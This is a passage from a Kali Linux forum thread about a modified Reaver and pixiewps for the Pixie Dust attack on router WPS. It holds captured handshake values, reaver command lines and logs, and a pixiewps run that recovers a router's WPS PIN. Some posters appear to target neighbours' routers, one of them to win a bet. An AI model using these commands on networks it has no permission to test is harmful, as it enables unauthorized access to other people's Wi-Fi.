Page 2 of 3 FirstFirst 123 LastLast
Results 51 to 100 of 107

Thread: Reaver modfication for Pixie Dust Attack

  1. #51
    Join Date
    2015-Apr
    Posts
    28
    Quote Originally Posted by soxrok2212 View Post
    without small keys.

    Code:
    Manufacturer: 
    Model: 
    Model Number: 
    Serial Number: 
    E-Nonce: 
    PKR: 
    PKR: 
    E-Hash1: 
    E-Hash2: 
    Authkey:
    Some of the first part may not be available, but if they are it would be helpful. And I can find the rest in the cap.
    Hello soxrox2212,

    Code:
    Manufacturer: AirTies Wireless Networks
    Model:AirTies Air5650
    Model Number: 1.0.2.0
    Serial Number: AT1731430001111
    E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
    PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e:ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e:78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:66:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb:73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15:aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42:d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d:e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:fa:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6:6d:e3:d9:60:3a:89:70:c3:2c:81
     
    PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2:73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05:35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:bf:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0:6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78:f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:94:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb:bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4:16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8:ff:a8:09:a3:ec:6f:e7:ae:8d:0e   (without -S)
    
    PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02  (with -S)
    
    E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf 
    
    E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80
    
    Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86
    Pıxıe is invulnerable for this modem . I wanna ask that maybe there is combination ,

    Example ;

    EHASH1=EHASK2=Serial number?...

    Can you try to find this modem's pin?

    Thanks
    Last edited by Saydamination; 2015-05-16 at 21:16.

  2. #52
    Join Date
    2015-Apr
    Posts
    15
    Hello,

    a suggestion for wash:
    can you add some kind of oui-support (like the -M switch in aircrack) ?

    Thanks.

  3. #53
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by SeaF0ur View Post
    In my area, the centurylink with a ZyXEL C1000Z is common... what kind of cap is needed? a full handshake right? and then a seperate txt with an unrelated set of pke/r ehash1/2 auth and nonce for that ap?
    For you to crack, all you need is t6_x's version of Reaver and pixiewps. For us to analyze, we need a cap of the wps exchange and the output of reaver.
    Last edited by soxrok2212; 2015-05-04 at 21:28.

  4. #54
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Saydamination View Post
    Hello soxrox2212,

    Code:
    Manufacturer: AirTies Wireless Networks
    Model:AirTies Air5650
    Model Number: 1.0.2.0
    Serial Number: AT1731430006993
    E-Nonce: c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34
    PKE:7e:9d:01:01:82:4b:31:74:e8:31:8b:9a:fb:70:01:9e:a1:0d:a4:bf:e8:27:ab:9d:56:ab:cf:47:53:06:50:5e:ed:d0:22:bb:ff:93:17:9e:59:9f:b5:83:d3:5e:ab:81:8e:78:f2:65:4e:a5:ee:5c:e0:83:86:d2:33:92:79:56:d0:66:41:5b:b0:83:9f:5c:fc:c6:bf:be:ab:19:5f:80:f7:fb:73:cf:43:ba:94:88:af:2c:bb:eb:d6:4c:85:16:1a:ff:15:aa:4b:bf:e7:67:11:1f:d5:bb:1f:31:c4:54:31:be:02:1b:f5:2f:56:29:53:92:ad:8a:31:ca:97:ff:e8:2b:6d:42:d4:1f:af:5e:b4:d2:b1:00:8e:7c:f8:69:1b:a5:7b:81:2d:e3:0a:53:d9:29:5f:7e:cd:d2:3f:cb:fc:94:23:be:62:fa:90:f6:c2:3b:0f:36:2b:e7:dc:3d:77:07:21:fd:c9:e6:6d:e3:d9:60:3a:89:70:c3:2c:81
     
    PKR:63:03:64:dc:34:f0:7c:41:b2:4e:d6:86:fc:0c:cb:b8:91:86:c9:ab:69:d6:70:36:91:6f:b8:2b:38:05:85:e2:73:82:ac:55:ae:eb:81:dc:3a:ea:8a:10:5d:36:a0:ea:05:35:f1:22:e3:02:64:d5:95:be:2c:e1:bd:83:cf:15:fc:bf:60:34:ca:9d:bf:82:45:f0:aa:63:37:13:37:27:e1:b0:6f:fd:6c:42:8d:4b:65:d2:72:b1:af:22:68:c0:d6:12:78:f0:7f:1d:f8:15:60:b7:e1:40:10:58:87:52:b3:17:70:94:1d:94:3a:b5:8a:56:ac:a3:96:d7:a1:3a:ec:f0:43:cb:bf:b8:2f:21:9a:e2:28:93:1f:30:b7:21:a0:c8:6c:28:f4:16:ed:10:69:ff:60:da:34:43:1c:0d:fe:d7:0f:19:cb:e9:5b:83:3b:a7:33:4a:1b:04:ea:03:c2:cd:74:53:2e:b8:ff:a8:09:a3:ec:6f:e7:ae:8d:0e   (without -S)
    
    PKR:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02  (with -S)
    
    E-Hash1:87:94:3b:ce:10:5f:f1:95:0d:b0:f7:99:03:8f:22:32:86:fb:83:6b:43:eb:33:0d:62:cb:da:01:47:a7:9e:cf 
    
    E-Hash2: bf:68:14:f6:fb:37:67:4d:ad:13:67:7b:8e:dc:5d:38:b2:82:bb:32:c3:c3:4a:ca:e4:3d:96:7b:49:e9:5c:80
    
    Authkey:20:70:0c:e6:ea:9d:8c:70:7d:cf:e4:56:cc:72:2b:90:64:1e:17:28:72:de:08:bd:13:fb:99:0f:39:62:fa:86
    Pıxıe is invulnerable for this modem . I wanna ask that maybe there is combination ,

    Example ;

    EHASH1=EHASK2=Serial number?...

    Can you try to find this modem's pin?

    Thanks
    While this is certainly possible, I highly doubt that E-S1 = E-S2 = Serial number for a few reasons:

    1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.

    2- Serial numbers can vary in length and conversion to HEX would give us a different length of data than we need.
    Last edited by soxrok2212; 2015-04-20 at 13:09.

  5. #55
    Join Date
    2013-Sep
    Posts
    262
    1- Serial numbers are assigned by the router manufacturer, not by the chip manufacturer and usually the router manufacturers do NOT modify the WPS implementation on their devices. Therefore, E-S1 = whatever the chip manufacturer implemented and the same goes for E-S2.
    very good point.
    Last edited by kcdtv; 2015-04-20 at 13:19. Reason: spelling

  6. #56
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    some if it be useful
    http://rpc.one.pl/pliki/openwrt/back...cja/README-WPS

    Focus on TP-LINK TL-WR740N
    is it possible to invent something ?

  7. #57
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by slmafiq View Post
    some if it be useful
    http://rpc.one.pl/pliki/openwrt/back...cja/README-WPS

    Focus on TP-LINK TL-WR740N
    is it possible to invent something ?
    theoretically yes

    But not in practice, the sampling space to bruteforce ends up being very large, bordering the "infinity", then the time for bruteforce ends up being a few decades.

    There are some tplink models with old firmware that the generation of the keys is based on the router's time, these yes, it is possible to attack, but I believe that nowadays are very rare. So far not found any, only what I have here at home, which is the year of 2005-2007, not remember.

    The firmware analysis takes too long and is an absurdly boring job, it may be that over time appear some news

  8. #58
    Join Date
    2015-Apr
    Location
    cosmoland
    Posts
    18
    Тhank you for your attention!
    if there is more convenient to create "Evil Twin attack"
    Are you familiar with this?

  9. #59
    Join Date
    2015-Apr
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    For you to crack, all you need is t6_x's version of Reaver. For us to analyze, we need a cap of the wps exchange and the output of reaver.
    Cracking's no issue... Would it be best to start with an evil twin to get the handshake cap? or would a wireshark cap with mdk3 runnin be sufficient?

  10. #60
    Join Date
    2015-Apr
    Posts
    9
    How can i make reaver send M2 without sending M1?

  11. #61
    Join Date
    2015-Apr
    Posts
    28
    Hi T6_x,

    Which Mac adress is orjinal mac on modem? wlan0-1? Wlan0= F8:1A:67.... wlan0-1= FA:1A:67 ....??

    Probably , you can update something with this information...




    br-admin Link encap:Ethernet HWaddr F8:1A:67:40:02:33
    inet addr:10.10.10.254 Bcast:10.10.10.255 Mask:255.255.255.0
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    br-lan Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    inet addr:172.25.10.230 Bcast:172.25.255.255 Mask:255.255.0.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1044 errors:0 dropped:26 overruns:0 frame:0
    TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:59454 (58.0 KiB) TX bytes:12990 (12.6 KiB)

    br-public Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    inet addr:10.10.20.230 Bcast:10.10.20.255 Mask:255.255.255.0
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1 errors:0 dropped:0 overruns:0 frame:0
    TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:46 (46.0 B) TX bytes:402 (402.0 B)

    eth0 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:316366 errors:0 dropped:3 overruns:0 frame:0
    TX packets:54223 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:69817474 (66.5 MiB) TX bytes:8268306 (7.8 MiB)
    Interrupt:5

    eth0.1 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    inet addr:169.10.10.254 Bcast:255.255.255.255 Mask:255.255.255.255
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

    eth0.2 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1169 errors:0 dropped:1 overruns:0 frame:0
    TX packets:96 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:95730 (93.4 KiB) TX bytes:13036 (12.7 KiB)

    eth0.3 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:1 errors:0 dropped:0 overruns:0 frame:0
    TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:46 (46.0 B) TX bytes:448 (448.0 B)

    eth1 Link encap:Ethernet HWaddr F8:1A:67:40:02:33
    UP BROADCAST MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:1000
    RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
    Interrupt:4

    lo Link encap:Local Loopback
    inet addr:127.0.0.1 Mask:255.0.0.0
    UP LOOPBACK RUNNING MTU:16436 Metric:1
    RX packets:174 errors:0 dropped:0 overruns:0 frame:0
    TX packets:174 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:0
    RX bytes:12833 (12.5 KiB) TX bytes:12833 (12.5 KiB)

    wlan0 Link encap:Ethernet HWaddr F8:1A:67:40:02:32
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:376 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:32
    RX bytes:0 (0.0 B) TX bytes:31239 (30.5 KiB)

    wlan0-1 Link encap:Ethernet HWaddr FA:1A:67:40:02:33
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:32
    RX bytes:0 (0.0 B) TX bytes:28963 (28.2 KiB)

    wlan0-2 Link encap:Ethernet HWaddr FA:1A:67:40:02:34
    UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
    RX packets:0 errors:0 dropped:0 overruns:0 frame:0
    TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
    collisions:0 txqueuelen:32
    RX bytes:0 (0.0 B) TX bytes:64 (64.0 B)
    Last edited by Saydamination; 2015-04-25 at 19:00. Reason: alright

  12. #62
    Join Date
    2015-Apr
    Posts
    39
    This happens sometimes, but it is difficult to create a solution, since each firmware works in a different way.

    Why not be something generic is difficult to create a solution.

  13. #63
    Join Date
    2015-Mar
    Posts
    127
    Any use 4 the -D, --daemonize option of Reaver?

    Benefits, specials cases?

  14. #64
    Join Date
    2015-Mar
    Posts
    127
    Getting the -m error when reaver trys to use pixiewps. That error has been explained as new feature pre release for new version 1.1

    I can work around that issue and just hand cut and paste hashes like the old'n days.

    But now reaver 1.5.2 downloaded from git today won't associate with even the neighborhood ***** router.
    Used aireplay-ng to associate with the router and she dropped her draws. And let me right in there.
    Then I used the -A option with reaver and it connected and got hashes but than -m.

    I'm I the only one?
    Last edited by nuroo; 2015-04-29 at 00:33.

  15. #65
    Join Date
    2013-Jul
    Posts
    818
    Musket Teams have voted to release their Pixie Dust Data Sequence Analyzer PDDSA-01.sh for general use. This script was originally written to work with VMR-MDK009x2.sh a WPS locked intrusion script. But it can work with any text file output from modded reaver programs showing both PKE and PKR.

    PDDSA-01.sh simply reads any data output in text format from a modded reaver program, looks for valid Pixie Dust Sequences and extracts the pin using pixiewps. No cut and paste. You can check all the sequences in the file or just one. After the first valid sequence is found the program can cycle thru all the other sequences as required.

    If you are not using VMR-MDK009x2 then simply use the command line:

    reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv | tee /root/VARMAC_LOGS/targetAP

    The reaver command line side can be altered as required however the -vv must remain or no data will be written.

    There is a help file in the download.

    You can download at two(2) locations

    PDDSA-01.sh has been updated to support routers giving altered text output,

    You can download PDDSA-02.sh at:

    http://www.datafilehost.com/d/e6a13191

    or thru aircrack-ng forums see thread

    http://forum.aircrack-ng.org/index.p...ic,868.15.html

    See thread 21

    MTeams
    Last edited by mmusket33; 2015-04-29 at 13:08.

  16. #66
    Join Date
    2015-Mar
    Posts
    141
    lol @ mmusket33 its soxrok2212 not soxrox2212 or soxorx2212 ( red sox refrence maybe? ;-)), not to be pedantic...

  17. #67
    Join Date
    2013-Jul
    Posts
    818
    Thanks aanarchyy we will correct that. If you find any bugs in the coding and we will reissue.

    MTEAMS

  18. #68
    Join Date
    2015-Mar
    Posts
    127
    @t6_x

    still hoping for a timer function for -g option

    -g <sec> # set timeout for chipset recovery...... next up date

  19. #69
    Join Date
    2015-Apr
    Posts
    9
    Technicolor TD5130

    pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b -s f4:7b:17:b3:dc:de:29:b2:87:fa:39:ab:66:ce:21:a4:91 :79:93:fc:d1:c5:48:ee:c0:c0:bb:27:4f:fd:ac:95 -z b7:a4:00:05:b2:31:b0:d7:53:96:a7:ce:2c:e0:50:8c:53 :24:e8:66:75:24:7d:32:31:5c:36:ca:54:75:37:50 -r 4f:f3:c0:b0:63:76:0e:1b:8c:22:b4:8f:00:26:0b:fc:ce :84:f5:91:df:46:5a:d0:d7:e6:ec:65:a6:03:56:bb:c1:a 8:10:db:34:7a:c3:29:c5:25:c3:9d:db:93:79:a2:1f:42: 38:64:cf:93:1b:19:49:85:6c:48:2a:6a:88:c1:25:09:58 :6e:2d:de:c1:a4:f2:5c:78:35:9e:8f:13:cc:81:9f:7f:0 d:0d:7c:43:52:72:f2:b5:08:84:ed:e2:bc:5b:26:32:e7: bb:69:ec:40:2e:42:fc:ff:d8:aa:4c:c8:be:f2:e9:ae:b3 :e8:82:6b:0e:1e:3e:fd:73:47:cb:72:b5:0e:f6:b4:ff:2 8:e4:67:8c:9d:2f:08:ee:d8:09:ab:0c:3f:02:44:73:72: 93:35:70:6b:7f:8d:3f:8e:cc:f1:9d:51:40:42:1d:66:d7 :d7:ee:61:9c:58:cc:2c:7b:0e:a4:64:b9:59:6a:76:e5:2 1:37:38:cb:b7:5c:1b:4d:36 -n 71:31:e9:e7:7b:a6:c7:f0:2d:6d:ac:d3:1e:fc:7b:1d -a a0:68:dd:b2:e5:5f:6e:55:54:37:b2:3b:71:cf:d5:a3:5b :14:15:23:49:33:77:17:79:f0:f4:cf:19:e1:09:1e -m f2:6c:ab:f5:0d:8f:a8:cf:f4:ab:9a:27:36:04:a4:3e -b 00:18:E7:******** -v 3 -f 4

    Pixiewps 1.1
    [*] PRNG Seed: 1317453909 (Sat Oct 1 07:25:09 2011)[*] PSK1: a6:6e:0e:6f:44:2c:6d:cf:ef:21:69:c0:55:e4:72:b7[*] PSK2: 73:87:3a:a1:84:e1:3a:30:fe:87:0c:93:fa:4e:f0:52[*] E-S1: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41[*] E-S2: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
    [+] WPS pin: 65056851
    [*] Time taken: 695 s

  20. #70
    Join Date
    2015-Mar
    Posts
    8
    @popthattif please, what command in reaver did you use to get the 00:18:E7 ? Did it work on the 18:17:25 too ? I tried everything and nothing seems to work.

  21. #71
    Join Date
    2015-Apr
    Location
    Paraguay
    Posts
    3
    Hi thanks I just wanted to mention that after running apt-get dist-upgrade. It no longer work.
    After attempting different steps to try to fix it. the only that did it was to

    #apt-get purge libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    then
    #apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

    recompiling reaver and installing it again.
    dunno if it was just me. But I was using a VM with 1.12 and my notebook aswell. After upgrading Kali, it no longer worked. Same problem on both. But is finally solved.

  22. #72
    Join Date
    2015-Mar
    Posts
    127
    Heard there may b a video tutorial soon, showing Howto use new pixiewps 1.1 with reaver??

    Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??

  23. #73
    For what its worth, this version of reaver, is now the default version in the main kali repo.
    More information:
    + http://git.kali.org/gitweb/?p=packag....git;a=summary
    + https://www.kali.org/penetration-tes...ck-ng-updates/
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Search: https://www.kali.org/search/
    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: http://tools.kali.org/

  24. #74
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Congrats!

    Could these guys have a dedicated R&D forum section maybe? Feels like walking on eggshells whenever discussing R&D.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  25. #75
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    Heard there may b a video tutorial soon, showing Howto use new pixiewps 1.1 with reaver??

    Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??


    We are working on it.

    I'm a little overworked, but I will make the necessary updates.


    I'm sorry for the delay in updates these past few weeks, I'm full of work.

  26. #76
    Join Date
    2015-Mar
    Posts
    127
    @t6x
    Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.

  27. #77
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    @t6x
    Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.
    if some tests I'm doing work, we will have some news in a few weeks


  28. #78
    Join Date
    2015-Mar
    Posts
    127
    If u need hash collection or beta test, I'm available

  29. #79
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by nuroo View Post
    If u need hash collection or beta test, I'm available
    With my limited time today, I'll try to look at that Greenwave data you sent me

    AND can you get me a beacon frame from it?
    Last edited by soxrok2212; 2015-05-04 at 18:51.

  30. #80
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    With my limited time today, I'll try to look at that Greenwave data you sent me

    AND can you get me a beacon frame from it?
    should be a beacon frame in the greenwave cap file i posted
    http://d-h.st/9dE1
    Last edited by aanarchyy; 2015-05-04 at 19:17.

  31. #81
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by aanarchyy View Post
    should be a beacon frame in the greenwave cap file i posted
    http://d-h.st/9dE1
    Ah, I think I passed right over that, thanks. I'm moving over to the original pixie dust thread because this doesn't really pertain to Reaver...
    Last edited by soxrok2212; 2015-05-04 at 19:29.

  32. #82
    Join Date
    2015-Apr
    Posts
    39
    Already has a new update on github.

    Was already using the new pixiewps, the Wiire had upgraded the reaver to work, now I made some adjustments to post a little more automated.

    I improved the code too

  33. #83
    Join Date
    2015-Apr
    Posts
    39
    Already has a new update on github.

    Bug fixes

  34. #84
    Join Date
    2015-Jun
    Posts
    2
    Hey,
    i tried to test forked reaver & Pixiewps on supposedly invulnerable "D-Link RTL 8671 EV 2006 27 07 (Realtek)".

    1. used reaver -i mon0 - bssid -v -K 1 (didn't used -S, as its a realtek chip)
    got all the arguments for pixiewps
    Result Found as...
    a. No WPS pin found
    b. WPS Pin= 12345670 (When used -f argument with pixiewps)


    2. Now tried to use WPS Generator

    3 pin spurted out. When tried to use to to find passphrase. Reaver never proceeds further.

    Which Pin is correct? When i use --pin in reaver. Reaver is just stucks in loops and then gets locked out after 10 tries.

  35. #85
    Join Date
    2015-Apr
    Posts
    39
    https://forums.kali.org/showthread.p...t-Attack/page5

    Read the page 5 for pin generator

  36. #86
    Join Date
    2015-Jun
    Posts
    2
    Thanks for the reply Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet**

  37. #87
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Vinit2512 View Post
    Thanks for the reply Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet**
    The RTL8671 is certainly different. It is a SoC (System on Chip) which means pretty much everything is done on that chip... different than your average AP. SoC are generally found in DSL+Cable+Fiber/Router combo devices which leads me to think that they use a different PRNG.

    The good news: When I first noticed the static E-Nonce on Realtek devices it kinda told me that their implementation was insecure. Again, seeing a strange nonce following the XX:XX:00:00 pattern, it leads me to think their implementation here is broken also. Wiire and I are looking at it and if we can't find anything, I'll talk with Dominique Bongard. All great people to work with and I love having the pleasure of being able to

    --I will move to the Pixie Dust thread since this is does not pertain to Reaver
    Last edited by soxrok2212; 2015-06-03 at 15:15.

  38. #88
    Join Date
    2015-Jun
    Posts
    2
    Hi guys,

    First, thank you very much for coming up and posting this great idea.

    I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
    I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

    This is the output I get:

    > reaver -i wlan1mon -c 6 -b 04:**:**:**:**:** -vv -S

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

    [+] Switching wlan1mon to channel 6
    [+] Waiting for beacon from 04:**:**:**:**:**
    [+] Associated with 04:**:**:**:**:** (ESSID: *****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 1
    [+] Pin count advanced: 1. Max pin attempts: 11000
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    ^C
    [+] Session saved.
    Any ideas?

    Thanks!

  39. #89
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Azul View Post
    Hi guys,

    First, thank you very much for coming up and posting this great idea.

    I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
    I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

    This is the output I get:



    Any ideas?

    Thanks!
    Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.

  40. #90
    Join Date
    2013-May
    Posts
    35
    On some Technicolor the modified reaver recovers the pin but not the passphrase it freezes on

    [+] Running reaver with the correct pin, wait ...
    [+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
